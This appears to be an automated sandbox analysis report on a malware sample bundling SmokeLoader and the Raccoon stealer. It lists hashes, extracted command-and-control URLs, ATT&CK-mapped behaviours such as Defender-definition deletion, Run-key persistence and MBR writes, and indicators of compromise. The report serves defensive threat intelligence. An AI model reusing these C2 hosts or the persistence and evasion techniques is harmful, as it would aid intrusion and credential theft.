raccoon | 65fa93616cdb8c92a541dd2ad8468d6688e1b1f2606891b56db3e90fbfc9acbd

Target

Install2.exe
Size

497KB
MD5

41a5f4fd1ea7cac4aa94a87aebccfef0
SHA1

0d0abf079413a4c773754bf4fda338dc5b9a8ddc
SHA256

97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9
SHA512

5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Score

10^/10

raccoon smokeloader backdoor bootkit facebook discovery evasion persistence phishing spyware stealer trojan upx

Malware Config

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command-Line Interface

T1059

pid	Process
7796	mpcmdrun.exe

Detected facebook phishing page
phishing facebook
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Blocklisted process makes network request 64 IoCs

flow	pid	Process
94	7808	MsiExec.exe
97	7808	MsiExec.exe
98	7808	MsiExec.exe
100	7808	MsiExec.exe
102	7808	MsiExec.exe
104	7808	MsiExec.exe
107	7808	MsiExec.exe
108	7808	MsiExec.exe
109	7808	MsiExec.exe
110	7808	MsiExec.exe
111	7808	MsiExec.exe
112	7808	MsiExec.exe
113	7808	MsiExec.exe
114	7808	MsiExec.exe
115	7808	MsiExec.exe
116	7808	MsiExec.exe
117	7808	MsiExec.exe
118	7808	MsiExec.exe
119	7808	MsiExec.exe
120	7808	MsiExec.exe
121	7808	MsiExec.exe
122	7808	MsiExec.exe
123	7808	MsiExec.exe
124	7808	MsiExec.exe
125	7808	MsiExec.exe
126	7808	MsiExec.exe
127	7808	MsiExec.exe
128	7808	MsiExec.exe
129	7808	MsiExec.exe
130	7808	MsiExec.exe
131	7808	MsiExec.exe
132	7808	MsiExec.exe
133	7808	MsiExec.exe
134	7808	MsiExec.exe
135	7808	MsiExec.exe
136	7808	MsiExec.exe
137	7808	MsiExec.exe
138	7808	MsiExec.exe
139	7808	MsiExec.exe
140	7808	MsiExec.exe
141	7808	MsiExec.exe
142	7808	MsiExec.exe
143	7808	MsiExec.exe
144	7808	MsiExec.exe
145	7808	MsiExec.exe
146	7808	MsiExec.exe
147	7808	MsiExec.exe
154	7808	MsiExec.exe
161	7808	MsiExec.exe
162	7808	MsiExec.exe
163	7808	MsiExec.exe
164	7808	MsiExec.exe
165	7808	MsiExec.exe
166	7808	MsiExec.exe
167	7808	MsiExec.exe
168	7808	MsiExec.exe
169	7808	MsiExec.exe
170	7808	MsiExec.exe
171	7808	MsiExec.exe
172	7808	MsiExec.exe
173	7808	MsiExec.exe
174	7808	MsiExec.exe
175	7808	MsiExec.exe
176	7808	MsiExec.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	Ultra.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	updatewin2.exe

Executes dropped EXE 47 IoCs

pid	Process
1984	Install2.tmp
368	Ultra.exe
880	ultramediaburner.exe
1000	ultramediaburner.tmp
1928	UltraMediaBurner.exe
868	Kixeshufadae.exe
1104	Cyshupaelaenu.exe
8532	001.exe
7628	installer.exe
5664	gpooe.exe
8260	jfiag3g_gg.exe
8760	jfiag3g_gg.exe
2476	AdvancedWindowsManager.exe
2504	AdvancedWindowsManager.exe
2540	AdvancedWindowsManager.exe
2576	AdvancedWindowsManager.exe
2324	AdvancedWindowsManager.exe
2880	AdvancedWindowsManager.exe
9844	askinstall39.exe
10068	setup.exe
3736	request2.exe
3812	main.exe
3880	SunLabsPlayer.exe
3944	005.exe
4064	ifhwwyy.exe
2908	jfiag3g_gg.exe
1164	toolspab1.exe
7824	toolspab1.exe
7908	42a25820.exe
8048	jfiag3g_gg.exe
5064	parse.exe
5080	parse.exe
5104	parse.exe
8780	data_load.exe
3440	data_load.exe
9984	lighteningplayer-cache-gen.exe
10028	4309.exe
10064	4BFF.exe
10096	51E9.exe
9932	588F.exe
10212	6472.exe
3660	6A4C.exe
3688	6472.exe
3908	updatewin1.exe
3868	updatewin1.exe
3624	updatewin2.exe
2500	5.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral6/files/0x00030000000131b1-145.dat	upx
behavioral6/files/0x00030000000131b1-148.dat	upx
behavioral6/files/0x00030000000131b1-146.dat	upx
behavioral6/files/0x00030000000131c0-156.dat	upx
behavioral6/files/0x00030000000131c0-159.dat	upx
behavioral6/files/0x00030000000131c0-157.dat	upx
behavioral6/files/0x00030000000131c0-162.dat	upx

Loads dropped DLL 64 IoCs

pid	Process
308	Install2.exe
1984	Install2.tmp
1984	Install2.tmp
1984	Install2.tmp
1984	Install2.tmp
880	ultramediaburner.exe
1000	ultramediaburner.tmp
1000	ultramediaburner.tmp
1000	ultramediaburner.tmp
1000	ultramediaburner.tmp
1000	ultramediaburner.tmp
1000	ultramediaburner.tmp
7628	installer.exe
7628	installer.exe
5664	gpooe.exe
5664	gpooe.exe
7628	installer.exe
5664	gpooe.exe
5664	gpooe.exe
8708	MsiExec.exe
8708	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
7628	installer.exe
7808	MsiExec.exe
7808	MsiExec.exe
7808	MsiExec.exe
4944	MsiExec.exe
4944	MsiExec.exe
4944	MsiExec.exe
4944	MsiExec.exe
4944	MsiExec.exe
4944	MsiExec.exe
4944	MsiExec.exe
7808	MsiExec.exe
4056	taskeng.exe
4056	taskeng.exe
4056	taskeng.exe
2496	Process not Found
4056	taskeng.exe
2516	Process not Found
4056	taskeng.exe
4056	taskeng.exe
4056	taskeng.exe
5144	Process not Found
2552	Process not Found
2588	Process not Found
7668	Process not Found
3736	request2.exe
3736	request2.exe
3812	main.exe
3880	SunLabsPlayer.exe
4064	ifhwwyy.exe
4064	ifhwwyy.exe
3880	SunLabsPlayer.exe
1164	toolspab1.exe
7824	toolspab1.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3672	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Necaecabewo.exe\""	Ultra.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gpooe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\8a6bb3f0-5ad8-4062-8c4f-33cb0719bd68\\6472.exe\" --AutoStart"	6472.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
80	ip-api.com
273	api.2ip.ua
274	api.2ip.ua
282	api.2ip.ua

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	6A4C.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs

pid	Process
3812	main.exe
3812	main.exe
3812	main.exe
3812	main.exe
3812	main.exe
3812	main.exe
3812	main.exe
3812	main.exe
5064	parse.exe
5080	parse.exe
5104	parse.exe
5064	parse.exe
5104	parse.exe
5080	parse.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1164 set thread context of 7824	1164	toolspab1.exe	110
PID 10096 set thread context of 1324	10096	51E9.exe	165

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Program Files (x86)\ogdtzM	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\Google\INRGESTXYG\ultramediaburner.exe.config	Ultra.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\ogdtzM\cache.dat	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\data.dll	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\bckf.fon	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\02_frenchtv.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-BDRI0.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac	SunLabsPlayer.exe

Drops file in Windows directory 32 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICC71.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID551.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC750.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID184.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID202.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\f75b1d2.msi	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.app.log	5.exe
File opened for modification	C:\Windows\Installer\MSIC116.tmp	msiexec.exe
File created	C:\Windows\Installer\f75b1d4.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICBB4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICE47.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC348.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC53D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f75b1d4.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBB76.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBCCF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID106.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\Installer\f75b1d6.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID280.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID2CF.tmp	msiexec.exe
File created	C:\Windows\Installer\f75b1d2.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB666.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBC32.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBD2D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBDBB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICBE4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID35C.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
9200	2500	WerFault.exe	186

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	42a25820.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	42a25820.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	42a25820.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
10192	bitsadmin.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
7924	taskkill.exe
4016	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 902b3477f240d701	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A6701371-ACE5-11EB-8BB5-DE0F3C10814B} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "326903770"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000051618adbbbd0f84eb34ff59fe7045e8f00000000020000000000106600000001000020000000f69d2452ea1a98872b86718acf3b33026e3dd29476bcf51e69df70d24a69d754000000000e8000000002000020000000ede235dfdd5ad0532e10e108403229ce2f40bf9c620a621696f5a103c722efe5200000002a0a1ec176dc2c173b09345954106760a35e5a50fcccadae2d82bc03470cbc484000000079121f674d00e355d1c0088049fa06079f0aadd7469054aaf09b062d41e897a202cb98b2ef37131dbe264c13e6b0e230a56879127ed9e0cfbe877d886e28e1c0	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000051618adbbbd0f84eb34ff59fe7045e8f000000000200000000001066000000010000200000008e72fd6354efb12ebe2edfc66ff75e15df7bbd58c229cb966f960bb63e68bea1000000000e8000000002000020000000a4ee548705ed146920d9d602d8597ca670691bdc622b0c0bd46d6643bf291a879000000047c38cce812fe6861b486b599cfc8ac00ab82009bdc99d9015ee69c62839d47772fd9fa720f8812c9a11599dfcc7eaf286e78d5c5e2bd8061cdc7bd777f0f78f365f8ea4f01578718cfb8af2c06f3701a3d8ec6097e1b5640e0aa1a2b3dc9ef4bbff04c168f5677b63626c9de6236e04a691f06cb9ab5866f3e188ee99cc7d6208ad989ac4b61a2e3ba5a1d1c8ff0650400000000011210d6d9935da6b3115f3120290684bca6c3d73de4d64bebbe198b7bbab9f7d986502e105d8a656c4ad653e63f554628ec639731fff9e7e75d7ec20ff32df	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
